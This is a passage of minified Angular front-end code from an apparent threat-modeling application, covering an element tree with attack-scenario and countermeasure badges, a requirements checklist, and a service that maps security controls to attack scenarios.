e=B();C(2),ri("color-scheme",e.theme.IsDarkMode?"dark":"initial"),at("placeholder",re(4,8,"general.Search")),V("ngModel",e.searchString),C(4),ri("opacity",e.keepTreeStructure?1:.5),at("matTooltip",re(7,10,"pages.modeling.containertree.keepTreeStructure")),C(7),at("matTooltip",re(14,12,"general.Close"))}}function Agt(t,a){if(1&t&&(m(0,"mat-icon",19),s(1,"flash_on"),u()),2&t){const e=B().$implicit;V("matBadge",B().GetNodeScenarios(e))}}function Tgt(t,a){if(1&t&&(m(0,"mat-icon",20),s(1,"security"),u()),2&t){const e=B().$implicit;V("matBadge",B().GetNodeMeasures(e))}}function Egt(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){be(e);const n=B().$implicit;return Me(B().filteredElement=n)}),oe(1,"translate"),s(2,"\n        "),m(3,"mat-icon"),s(4,"filter_alt"),u(),s(5,"\n      "),u()}2&t&&at("matTooltip",re(1,1,"pages.modeling.containertree.filter"))}function Dgt(t,a){if(1&t){const e=Ye();m(0,"button",22),he("click",function(){return be(e),Me(B(2).filteredElement=null)}),oe(1,"translate"),s(2,"\n        "),m(3,"mat-icon"),s(4,"filter_alt_off"),u(),s(5,"\n      "),u()}2&t&&at("matTooltip",re(1,1,"pages.modeling.containertree.filterOff"))}function xgt(t,a){if(1&t){const e=Ye();m(0,"mat-tree-node",12),he("click",function(){const r=be(e).$implicit;return Me(B().OnNodeClicked(r))}),s(1,"\n      "),m(2,"span",13),s(3),u(),s(4,"\xa0"),m(5,"span",14),s(6),u(),s(7," \n      "),ne(8,Agt,2,1,"mat-icon",15),s(9,"\n      "),ne(10,Tgt,2,1,"mat-icon",16),s(11,"\n      "),ne(12,Egt,6,3,"button",17),s(13,"\n      "),ne(14,Dgt,6,3,"button",18),s(15,"\n    "),u()}if(2&t){const e=a.$implicit,i=B();ri("display",i.searchString&&i.hideLeafNode(e)?"none":"flex"),Ct("highlight-light",i.isSelected(e)&&!i.theme.IsDarkMode)("highlight-dark",i.isSelected(e)&&i.theme.IsDarkMode),V("id",e.ID),C(3),ke(e.GetProperty("Name")),C(3),ke(i.GetNodeInfo(e)),C(2),V("ngIf",i.ShowScenarios&&i.GetNodeScenarios(e)>0),C(2),V("ngIf",i.ShowMeasures&&i.GetNodeMeasures(e)>0),C(2),V("ngIf",e!==i.filteredElement),C(2),V("ngIf",e===i.filteredElement)}}function wgt(t,a){if(1&t&&(m(0,"mat-icon",19),s(1,"flash_on"),u()),2&t){const e=B().$implicit;V("matBadge",B().GetNodeScenarios(e))}}function Igt(t,a){if(1&t&&(m(0,"mat-icon",20),s(1,"security"),u()),2&t){const e=B().$implicit;V("matBadge",B().GetNodeMeasures(e))}}function Rgt(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){be(e);const n=B().$implicit;return Me(B().filteredElement=n)}),oe(1,"translate"),s(2,"\n          "),m(3,"mat-icon"),s(4,"filter_alt"),u(),s(5,"\n        "),u()}2&t&&at("matTooltip",re(1,1,"pages.modeling.containertree.filter"))}function Sgt(t,a){if(1&t){const e=Ye();m(0,"button",22),he("click",function(){return be(e),Me(B(2).filteredElement=null)}),oe(1,"translate"),s(2,"\n          "),m(3,"mat-icon"),s(4,"filter_alt_off"),u(),s(5,"\n        "),u()}2&t&&at("matTooltip",re(1,1,"pages.modeling.containertree.filterOff"))}function kgt(t,a){if(1&t){const e=Ye();m(0,"mat-nested-tree-node",23),s(1,"\n      "),m(2,"div",24),he("click",function(){const r=be(e).$implicit;return Me(B().OnNodeClicked(r))}),s(3,"\n        "),m(4,"button",25),s(5,"\n          "),m(6,"mat-icon",26),s(7),u(),s(8,"\n        "),u(),s(9,"\n        "),m(10,"span",13),s(11),u(),s(12,"\n        "),ne(13,wgt,2,1,"mat-icon",15),s(14,"\n        "),ne(15,Igt,2,1,"mat-icon",16),s(16,"\n        "),ne(17,Rgt,6,3,"button",17),s(18,"\n        "),ne(19,Sgt,6,3,"button",18),s(20,"\n      "),u(),s(21,"\n      "),s(22,"\n      "),m(23,"div",27),s(24,"\n        "),Ir(25,28),s(26,"\n      "),u(),s(27,"\n    "),u()}if(2&t){const e=a.$implicit,i=B();V("id",e.ID),C(2),ri("display",i.searchString&&i.hideParentNode(e)?"none":"flex"),Ct("highlight-light",i.isSelected(e)&&!i.theme.IsDarkMode)("highlight-dark",i.isSelected(e)&&i.theme.IsDarkMode),C(5),ct("\n            ",i.treeControl.isExpanded(e)?"expand_more":"chevron_right","\n          "),C(4),ke(e.GetProperty("Name")),C(2),V("ngIf",i.ShowScenarios&&i.GetNodeScenarios(e)>0),C(2),V("ngIf",i.ShowMeasures&&i.GetNodeMeasures(e)>0),C(2),V("ngIf",e!==i.filteredElement),C(2),V("ngIf",e===i.filteredElement),C(4),Ct("element-tree-invisible",!i.treeControl.isExpanded(e))}}function Pgt(t,a){if(1&t){const e=Ye();s(0,"\n    "),m(1,"button",29),he("click",function(){return be(e),Me(B().searchString="")}),s(2,"\n      "),m(3,"mat-icon"),s(4,"search"),u(),s(5,"\n      "),m(6,"span"),s(7),oe(8,"translate"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"button",30),he("click",function(){return be(e),Me(B().filteredElement=null)}),s(12,"\n      "),m(13,"mat-icon"),s(14,"filter_alt_off"),u(),s(15,"\n      "),m(16,"span"),s(17),oe(18,"translate"),u(),s(19,"\n    "),u(),s(20,"\n    "),m(21,"button",31),s(22,"\n      "),m(23,"mat-icon"),s(24,"info"),u(),s(25,"\n      "),m(26,"mat-slide-toggle",32),he("ngModelChange",function(n){return be(e),Me(B().ShowScenarios=n)})("click",function(n){return n.stopPropagation()}),s(27),oe(28,"translate"),u(),s(29,"\n    "),u(),s(30,"\n    "),m(31,"button",31),s(32,"\n      "),m(33,"mat-icon"),s(34,"info"),u(),s(35,"\n      "),m(36,"mat-slide-toggle",32),he("ngModelChange",function(n){return be(e),Me(B().ShowMeasures=n)})("click",function(n){return n.stopPropagation()}),s(37),oe(38,"translate"),u(),s(39,"\n    "),u(),s(40,"\n  ")}if(2&t){const e=B();C(7),ke(re(8,7,"general.Search")),C(4),V("disabled",null==e.filteredElement),C(6),ke(re(18,9,"pages.modeling.containertree.filterReset")),C(9),V("ngModel",e.ShowScenarios),C(1),ct("\n        ",re(28,11,"general.AttackScenarios"),"\n      "),C(9),V("ngModel",e.ShowMeasures),C(1),ct("\n        ",re(38,13,"general.Countermeasures"),"\n      ")}}let Ogt=(()=>{class t{constructor(e,i,n){this.dataService=e,this.theme=i,this.locStorage=n,this.infoMap=new Map,this.scenarioMap=new Map,this.measureMap=new Map,this.showScenarios=null,this.showMeasures=null,this.treeControl=new Rz(r=>{if(this.isContainer(r))return r.GetChildren()}),this.dataSource=new HW,this.searchString=null,this.selectionChanged=new Tt,this.filterChanged=new Tt,this.hasChild=(r,c)=>this.isContainer(c)&&c.GetChildren().length>0}isContainer(e){return e&&e.GetChildren&&"function"==typeof e.GetChildren}get ShowScenarios(){if(null==this.showScenarios){const e=this.locStorage.Get(si.PAGE_MODELING_CONTAINERTREE_SHOW_SCEN);this.showScenarios="true"==e||null==e}return this.showScenarios}set ShowScenarios(e){this.locStorage.Set(si.PAGE_MODELING_CONTAINERTREE_SHOW_SCEN,String(e)),this.showScenarios=e}get ShowMeasures(){if(null==this.showMeasures){const e=this.locStorage.Get(si.PAGE_MODELING_CONTAINERTREE_SHOW_MEAS);this.showMeasures="true"==e||null==e}return this.showMeasures}set ShowMeasures(e){this.locStorage.Set(si.PAGE_MODELING_CONTAINERTREE_SHOW_MEAS,String(e)),this.showMeasures=e}get keepTreeStructure(){const e=this.locStorage.Get(si.PAGE_MODELING_CONTAINERTREE_KEEP_STRUC);return"true"==e||null==e}set keepTreeStructure(e){this.locStorage.Set(si.PAGE_MODELING_CONTAINERTREE_KEEP_STRUC,String(e))}get elements(){return this._elements}set elements(e){this._elements=e,this.selectedElement=this.filteredElement=null,null!=this.searchString&&(this.searchString=""),this.RefreshTree()}get selectedElement(){return this._selectedElement}set selectedElement(e){if(this._selectedElement=e,e){let i=this.leafNodes.find(n=>n.nativeElement.id===e.ID);i||(i=this.nestedNodes.find(n=>n.nativeElement.id===e.ID)),null==i||i.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})}}get filteredElement(){return this._filteredElement}set filteredElement(e){this._filteredElement=e,this.filterChanged.emit(e)}set input(e){e&&setTimeout(()=>{e.nativeElement.focus()})}ngOnInit(){this.dataService.Project.AttackScenariosChanged.subscribe(e=>this.scenarioMap=new Map),this.dataService.Project.CountermeasuresChanged.subscribe(e=>this.measureMap=new Map),this.RefreshTree()}GetNodeInfo(e){var i,n;if(this.infoMap.has(e.ID))return this.infoMap.get(e.ID);if(e instanceof os&&e.Sender&&e.Receiver){if(!e.ShowName){let r="\u2192";return e.ArrowPos==wn.Both?r="\u2194":e.ArrowPos==wn.Start&&(r="\u2190"),"("+(null===(i=e.Sender)||void 0===i?void 0:i.GetProperty("Name"))+r+(null===(n=e.Receiver)||void 0===n?void 0:n.GetProperty("Name"))+")"}}else this.infoMap.set(e.ID,"");return""}GetNodeScenarios(e){if(this.scenarioMap.has(e.ID))return this.scenarioMap.get(e.ID);const i=this.dataService.Project.GetAttackScenariosApplicable().filter(n=>{var r;return n.Target==e||(null===(r=n.Targets)||void 0===r?void 0:r.includes(e))}).length;return this.scenarioMap.set(e.ID,i),i}GetNodeMeasures(e){if(this.measureMap.has(e.ID))return this.measureMap.get(e.ID);const i=this.dataService.Project.GetCountermeasuresApplicable().filter(n=>n.Targets.includes(e)).length;return this.measureMap.set(e.ID,i),i}RefreshTree(){this.dataSource.data=null,this.elements&&(this.dataSource.data=[this.elements],this.subscription&&this.subscription.unsubscribe(),this.subscription=this.elements.ChildrenChanged.subscribe(e=>{this.RefreshTree()}),this.dataSource.data.forEach(e=>this.treeControl.expandDescendants(e)))}OnNodeClicked(e){var i;e!=this.elements&&(this.selectedElement=e,null===(i=this.selectionChanged)||void 0===i||i.emit(e))}hideLeafNode(e){return!1===new RegExp(this.searchString,"i").test(e.GetProperty("Name"))}hideParentNode(e){return this.hideLeafNode(e)&&(!this.keepTreeStructure||this.treeControl.getDescendants(e).every(i=>this.hideLeafNode(i)))}isSelected(e){var i;return(null===(i=this.selectedElement)||void 0===i?void 0:i.ID)==(null==e?void 0:e.ID)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Oa),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-container-tree"]],viewQuery:function(e,i){if(1&e&&(Mi(Mgt,5),Mi(Y3,5,mi),Mi(J3,5,mi)),2&e){let n;Vt(n=Bt())&&(i.input=n.first),Vt(n=Bt())&&(i.leafNodes=n),Vt(n=Bt())&&(i.nestedNodes=n)}},inputs:{elements:"elements",selectedElement:"selectedElement",filteredElement:"filteredElement"},outputs:{selectionChanged:"selectionChanged",filterChanged:"filterChanged"},decls:27,vars:8,consts:[[2,"position","relative"],["mat-icon-button","","matTooltipShowDelay","1000",1,"moreBtn",3,"matMenuTriggerFor","matTooltip"],[4,"ngIf"],[1,"element-tree",2,"background-color","transparent",3,"dataSource","treeControl"],["matTreeNodeToggle","","class","onHover",3,"id","display","highlight-light","highlight-dark","click",4,"matTreeNodeDef"],[3,"id",4,"matTreeNodeDef","matTreeNodeDefWhen"],["moreMenu","matMenu"],["matMenuContent",""],["autofocus","",1,"searchBox",3,"ngModel","placeholder","ngModelChange"],["search",""],["mat-icon-button","","matTooltipShowDelay","1000",1,"small-icon-button",2,"right","42px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",1,"small-icon-button",2,"right","25px",3,"matTooltip","click"],["matTreeNodeToggle","",1,"onHover",3,"id","click"],[2,"font-size","small"],[2,"font-size","x-small"],["class","scenarioBadge","matBadgeColor","warn","matBadgeSize","small","matBadgePosition","below",3,"matBadge",4,"ngIf"],["class","measureBadge","matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below",3,"matBadge",4,"ngIf"],["mat-icon-button","","class","hoverIcon","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matBadgeColor","warn","matBadgeSize","small","matBadgePosition","below",1,"scenarioBadge",3,"matBadge"],["matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below",1,"measureBadge",3,"matBadge"],["mat-icon-button","","matTooltipShowDelay","1000",1,"hoverIcon",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"id"],[1,"mat-tree-node","onHover",3,"click"],["mat-icon-button","","matTreeNodeToggle",""],[1,"mat-icon-rtl-mirror"],["role","group"],["matTreeNodeOutlet",""],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item",""],["color","primary",3,"ngModel","ngModelChange","click"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"button",1),oe(3,"translate"),s(4,"\n    "),m(5,"mat-icon"),s(6,"more_vert"),u(),s(7,"\n  "),u(),s(8,"\n  "),ne(9,vgt,20,14,"ng-container",2),s(10,"\n  "),m(11,"mat-tree",3),s(12,"\n    "),s(13,"\n    "),s(14,"\n    "),ne(15,xgt,16,13,"mat-tree-node",4),s(16,"\n    "),s(17,"\n    "),ne(18,kgt,28,15,"mat-nested-tree-node",5),s(19,"\n  "),u(),s(20,"\n"),u(),s(21,"\n"),m(22,"mat-menu",null,6),s(24,"\n  "),ne(25,Pgt,41,15,"ng-template",7),s(26," \n"),u()),2&e){const n=Ti(23);C(2),at("matTooltip",re(3,6,"general.More")),V("matMenuTriggerFor",n),C(7),V("ngIf",null!=i.searchString),C(2),V("dataSource",i.dataSource)("treeControl",i.treeControl),C(7),V("matTreeNodeDefWhen",i.hasChild)}},dependencies:[Ri,an,Ta,Ea,oa,Hh,J3,Kw,Yw,Xw,Y3,ab,da,Xo,qo,po,Zc,Pa,vg,Xi],styles:[".mat-tree-node[_ngcontent-%COMP%]{min-height:26px!important;height:26px}.element-tree-invisible[_ngcontent-%COMP%]{display:none}.element-tree[_ngcontent-%COMP%]   ul[_ngcontent-%COMP%], .element-tree[_ngcontent-%COMP%]   li[_ngcontent-%COMP%]{margin-top:0;margin-bottom:0;list-style-type:none}.onHover[_ngcontent-%COMP%]   .hoverIcon[_ngcontent-%COMP%]{display:none}.onHover[_ngcontent-%COMP%]:hover   .hoverIcon[_ngcontent-%COMP%]{display:block}.moreBtn[_ngcontent-%COMP%]{position:absolute;top:0;right:0;width:25px;height:25px;line-height:25px}.searchBox[_ngcontent-%COMP%]{position:absolute;top:3px;right:27px;width:100px;height:15px;line-height:15px;font-size:x-small}.small-icon-button[_ngcontent-%COMP%]{position:absolute;top:1px;width:24px!important;height:24px!important;line-height:24px!important}.small-icon-button[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{width:16px!important;height:16px!important;line-height:16px!important}.small-icon-button[_ngcontent-%COMP%]   .material-icons[_ngcontent-%COMP%]{font-size:16px!important}.element-tree[_ngcontent-%COMP%]   .mat-nested-tree-node[_ngcontent-%COMP%]   div[role=group][_ngcontent-%COMP%]{padding-left:10px}.element-tree[_ngcontent-%COMP%]   div[role=group][_ngcontent-%COMP%] > .mat-tree-node[_ngcontent-%COMP%]{padding-left:40px}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.scenarioBadge[_ngcontent-%COMP%]     .mat-badge-content{right:-3px!important;bottom:-3px!important}.measureBadge[_ngcontent-%COMP%]     .mat-badge-content{right:-6px!important;bottom:-3px!important}"]}),t})();function Ngt(t,a){if(1&t&&(m(0,"th",6),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Abbr)}}function Lgt(t,a){if(1&t&&(m(0,"mat-icon"),s(1),u()),2&t){const e=B().index,i=B().$implicit,n=B();C(1),ke(n.GetCellStatus(i,e)?"done":"close")}}function zgt(t,a){if(1&t){const e=Ye();m(0,"td",10),he("click",function(){const r=be(e).index,c=B().$implicit;return Me(B().OnRequirementClick(c,r))}),s(1,"\n        "),ne(2,Lgt,2,1,"mat-icon",11),s(3,"\n      "),u()}if(2&t){const e=a.index,i=B().$implicit,n=B();ri("background-color",n.GetBackgroundColor(i,e)),C(2),V("ngIf",null!=n.GetCellStatus(i,e))}}function Wgt(t,a){if(1&t){const e=Ye();m(0,"button",12),he("click",function(){return be(e),Me(B().$implicit.value.NeedsReview=!1)}),oe(1,"translate"),s(2,"\n          "),m(3,"mat-icon"),s(4,"thumb_up"),u(),s(5,"\n        "),u()}2&t&&at("matTooltip",re(1,1,"general.OK"))}function Fgt(t,a){if(1&t){const e=Ye();m(0,"button",12),he("click",function(){be(e);const n=B().$implicit;return Me(B().UpdateValues(n))}),oe(1,"translate"),s(2,"\n          "),m(3,"mat-icon"),s(4,"update"),u(),s(5,"\n        "),u()}2&t&&at("matTooltip",re(1,1,"general.Update"))}function Vgt(t,a){if(1&t&&(m(0,"tr"),s(1,"\n      "),m(2,"td")(3,"span"),s(4),u()(),s(5,"\n      "),ne(6,zgt,4,3,"td",7),s(7,"\n      "),m(8,"td",8),s(9,"\n        "),ne(10,Wgt,6,3,"button",9),s(11,"\n        "),ne(12,Fgt,6,3,"button",9),s(13,"\n      "),u(),s(14,"\n    "),u()),2&t){const e=a.$implicit,i=B();C(3),ri("margin-left",(20*e.level).toString()+"px"),C(1),ke(e.requirement.Name),C(2),V("ngForOf",i.checklist.Type.Levels),C(4),V("ngIf",e.value.NeedsReview),C(2),V("ngIf",e.updateAvailable)}}let Bgt=(()=>{class t{constructor(e){this.dataService=e,this.Requirements=[]}ngOnInit(){let e=this.dataService.Project.GetDevices().find(n=>n.Checklists.includes(this.checklist)),i=(n,r)=>{n.forEach(c=>{let d=!1,T=this.checklist.RequirementValues.find(q=>q.RequirementTypeID==c.ID);if(T){let q=c.EvalRequirement(e);if(q)if(q.length!=T.Values.length)d=!0;else for(let Y=0;Y<q.length;Y++)q[Y]!=T.Values[Y]&&(d=!0)}else{T={RequirementTypeID:c.ID,NeedsReview:!1,Values:new Array(this.checklist.Type.Levels.length).fill(!1)},this.checklist.RequirementValues.push(T);let q=c.EvalRequirement(e);q&&(T.Values=q,T.NeedsReview=c.ReqFulfillRule.NeedsReview)}this.Requirements.push({requirement:c,level:r,value:T,updateAvailable:d}),c.SubReqTypes.length>0&&i(c.SubReqTypes,r+1)})};i(this.checklist.Type.RequirementTypes,0)}UpdateValues(e){let i=this.dataService.Project.GetDevices().find(r=>r.Checklists.includes(this.checklist)),n=e.requirement.EvalRequirement(i);n&&(e.value.Values=n,e.updateAvailable=!1,e.value.NeedsReview=!0)}OnRequirementClick(e,i){if(e.value.Values[i]=!e.value.Values[i],e.value.Values[i])for(let n=i;n<e.value.Values.length;n++)e.value.Values[n]=!0}GetCellStatus(e,i){return e.requirement.RequiredPerLevel[i]?!!e.value.Values[i]:null}GetBackgroundColor(e,i){let n=this.GetCellStatus(e,i);return n?"#589758":0==n?"#b15b5b":"transparent"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-checklist"]],inputs:{checklist:"checklist"},decls:28,vars:8,consts:[[2,"margin","10px"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[2,"border-spacing","2px 2px"],["style","text-align: center; padding: 0 3px;","matTooltipShowDelay","1000",3,"matTooltip",4,"ngFor","ngForOf"],[4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",2,"text-align","center","padding","0 3px",3,"matTooltip"],["style","text-align: center; height: 25px; min-width: 30px;",3,"backgroundColor","click",4,"ngFor","ngForOf"],[2,"height","20px"],["mat-icon-button","","class","doneBtn","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],[2,"text-align","center","height","25px","min-width","30px",3,"click"],[4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",1,"doneBtn",3,"matTooltip","click"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),m(5,"mat-form-field",1),s(6,"\n    "),m(7,"mat-label"),s(8),oe(9,"translate"),u(),s(10,"\n    "),m(11,"textarea",2),he("ngModelChange",function(r){return i.checklist.Description=r}),u(),s(12,"\n  "),u(),s(13,"\n  "),m(14,"table",3),s(15,"\n    "),m(16,"tr"),s(17,"\n      "),it(18,"th"),s(19,"\n      "),ne(20,Ngt,2,2,"th",4),s(21,"\n      "),it(22,"th"),s(23,"\n    "),u(),s(24,"\n    "),ne(25,Vgt,15,6,"tr",5),s(26,"\n  "),u(),s(27,"\n"),u()),2&e&&(C(3),ke(i.checklist.Name),C(5),ke(re(9,6,"properties.Description")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.checklist.Description),C(9),V("ngForOf",i.checklist.Type.Levels),C(5),V("ngForOf",i.Requirements))},dependencies:[Zi,Ri,an,Ta,Ea,oa,da,nn,un,Go,Xa,Pa,Xi],styles:[".doneBtn[_ngcontent-%COMP%]{height:16px!important;line-height:14px!important;transform:scale(.7);width:25px}"]}),t})(),Hgt=(()=>{class t{constructor(e){this.dataService=e}GenerateDiagramMitigations(e){return this.generateMitigations(e.ID)}GenerateStackMitigations(e){return this.generateMitigations(e.ID)}generateMitigations(e){let i=this.dataService.Project,n=this.dataService.Config;i.GetCountermeasures().filter(k=>k.ViewID==e&&k.MappingState==zn.New).forEach(k=>k.MappingState=zn.Stable);let r=i.GetCountermeasures().filter(k=>k.ViewID==e&&k.IsGenerated);r.forEach(k=>k.RuleStillApplies=!0),r.filter(k=>k.MappingState==zn.Removed).forEach(k=>i.DeleteCountermeasure(k)),r=r.filter(k=>k.MappingState!=zn.Removed);let c=[];return r.forEach(k=>c.push({map:k,attackScenarioIDs:k.AttackScenarios.map(q=>null==q?void 0:q.ID),targetIDs:k.Targets.map(q=>null==q?void 0:q.ID)})),(k=>{let q=n.GetControls();k.forEach(Y=>{let te=q.filter(pe=>pe.MitigatedAttackVectors.includes(Y.AttackVector));te.push(...q.filter(pe=>pe.MitigatedThreatRules.includes(Y.ThreatRule))),te.forEach(pe=>{let Re;Re=Y.Target?[Y.Target]:Y.Targets;const Fe=i.GetCountermeasures().find(Ne=>Ne.Control==pe&&(Ne.AttackScenarios.includes(Y)||Ne.Targets.includes(Y.Target)||Ne.Targets.some(et=>Y.Targets.includes(et))));if(Fe){Fe.MappingState=zn.Stable,r.splice(r.findIndex(et=>et.ID==Fe.ID),1),Fe.AddAttackScenario(Y),Re.forEach(et=>Fe.AddTarget(et));const Ne=c.find(et=>et.map==Fe);if(Ne){let et=Ne.attackScenarioIDs.indexOf(Y.ID);et>=0&&Ne.attackScenarioIDs.splice(et,1),Re.forEach(ut=>{et=Ne.targetIDs.indexOf(ut.ID),et>=0&&Ne.targetIDs.splice(et,1)})}}else i.CreateCountermeasure(e,!0).SetMapping(pe,Re,[Y])})})})(i.GetAttackScenarios().filter(k=>k.ViewID==e&&(k.AttackVector||k.ThreatRule)&&[zn.New,zn.Stable].includes(k.MappingState))),r.forEach(k=>{k.MitigationState==Ra.NotSet?k.MappingState=zn.Removed:k.RuleStillApplies=!1}),c.forEach(k=>{if(k.map.MappingState!=zn.Removed){for(let q=0;q<k.targetIDs.length;q++)k.targetIDs[q]&&(k.map.RemoveTarget(k.targetIDs[q]),k.targetIDs.splice(q,1),q--);(k.targetIDs.length>0||k.attackScenarioIDs.length>0)&&k.map.CleanUpReferences()}}),i.GetCountermeasures().filter(k=>k.ViewID==e).filter(k=>0==k.AttackScenarios.length&&0==k.Targets.length).forEach(k=>{k.MappingState=zn.Removed}),i.GetCountermeasures().filter(k=>k.ViewID==e)}}return t.\u0275fac=function(e){return new(e||t)(At(Yi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Ugt(t,a){1&t&&it(0,"mat-progress-spinner",30),2&t&&V("diameter",20)}function qgt(t,a){if(1&t&&(m(0,"span",31),s(1),u()),2&t){const e=B();C(1),ke(e.GetApplicableCount())}}function Ggt(t,a){1&t&&(m(0,"th",32),s(1," "),u())}function jgt(t,a){if(1&t&&(m(0,"td",33),s(1," "),m(2,"mat-icon"),s(3),u(),s(4," "),u()),2&t){const e=a.$implicit,i=B();C(3),ke(i.GetStateIcon(e))}}function Qgt(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function $gt(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function Kgt(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function Xgt(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function Ygt(t,a){1&t&&(m(0,"th",34),s(1," "),u())}function Jgt(t,a){if(1&t&&(m(0,"td",33),s(1," "),m(2,"mat-icon",35),oe(3,"translate"),s(4),u(),s(5," "),u()),2&t){const e=a.$implicit,i=B();C(2),at("matTooltip",re(3,2,i.GetCreationTypeIconTooltip(e))),C(2),ke(i.GetCreationTypeIcon(e))}}function Zgt(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Control")," "))}function e0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",null==e.Control?null:e.Control.GetProperty("Name")," ")}}function t0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.AttackVectors")," "))}function i0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetAttackVectors(e)," ")}}function a0t(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Progress")," "))}function n0t(t,a){1&t&&it(0,"mat-progress-bar",38),2&t&&V("value",B().$implicit.MitigationProcess.Progress)}function o0t(t,a){if(1&t&&(m(0,"td",33),s(1," \n          "),ne(2,n0t,1,1,"mat-progress-bar",37),s(3,"\n        "),u()),2&t){const e=a.$implicit;C(2),V("ngIf",e.MitigationProcess)}}function r0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function s0t(t,a){if(1&t&&(m(0,"option",41),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetMitigationStateName(e)))}}function c0t(t,a){if(1&t){const e=Ye();m(0,"td",33),s(1,"\n          "),m(2,"select",39),he("ngModelChange",function(n){return Me(be(e).$implicit.MitigationState=n)}),s(3,"\n            "),ne(4,s0t,3,4,"option",40),s(5,"\n          "),u(),s(6,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.MitigationState),C(2),V("ngForOf",i.GetMitigationStates())}}function l0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Targets")," "))}function d0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit,i=B();Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetTargets(e)," ")}}function m0t(t,a){1&t&&(m(0,"th",36),s(1," "),u())}function u0t(t,a){if(1&t){const e=Ye();m(0,"td",33),s(1," "),m(2,"mat-icon",42),he("click",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function h0t(t,a){1&t&&it(0,"tr",43)}function f0t(t,a){if(1&t){const e=Ye();m(0,"tr",44),he("click",function(){const r=be(e).$implicit;return Me(B().SelectCountermeasure(r))})("dblclick",function(n){const c=be(e).$implicit;return Me(B().OnMappingDblClick(c,n))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n      "),u()}if(2&t){const e=a.$implicit,i=B();Ct("selected-item",i.IsCountermeasureSelected(e))("removed-item",i.IsCountermeasureRemoved(e)||i.IsCountermeasureNotApplying(e)||i.IsCountermeasureRejected(e)||i.IsCountermeasureDuplicated(e)),V("id",e.ID)}}function p0t(t,a){if(1&t){const e=Ye();m(0,"tr",45),s(1,"\n        "),m(2,"td",46),he("contextmenu",function(n){return be(e),Me(B().OpenContextMenu(n,null))}),s(3),oe(4,"translate"),u(),s(5,"\n      "),u()}2&t&&(C(3),ke(re(4,1,"pages.modeling.countermeasuretable.noCountermeasures")))}function _0t(t,a){1&t&&(m(0,"th",32),s(1," "),u())}function g0t(t,a){if(1&t&&(m(0,"td",33),s(1," "),m(2,"mat-icon"),s(3),u(),s(4," "),u()),2&t){const e=a.$implicit,i=B();C(3),ke(i.GetStateIcon(e))}}function C0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function y0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function b0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function 